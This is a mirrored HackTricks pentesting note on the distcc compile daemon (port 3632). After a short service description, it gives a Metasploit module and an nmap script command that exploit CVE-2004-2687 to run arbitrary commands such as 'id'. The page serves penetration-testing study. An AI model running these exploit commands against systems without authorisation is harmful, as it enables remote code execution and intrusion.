mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-06 10:18:55 +00:00
29 lines
954 B
Markdown
29 lines
954 B
Markdown
# 3632 - Pentesting distcc
|
|
|
|
## Basic Information
|
|
|
|
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
|
|
|
|
**Default port:** 3632
|
|
|
|
```text
|
|
PORT STATE SERVICE
|
|
3632/tcp open distccd
|
|
```
|
|
|
|
## Exploitation
|
|
|
|
Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
|
|
|
|
```bash
|
|
msf5 > use exploit/unix/misc/distcc_exec
|
|
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
|
|
```
|
|
|
|
## Resources
|
|
|
|
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
|
|
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
|
|
|
|
Post created by **Álex B \(@r1p\)**
|
|
|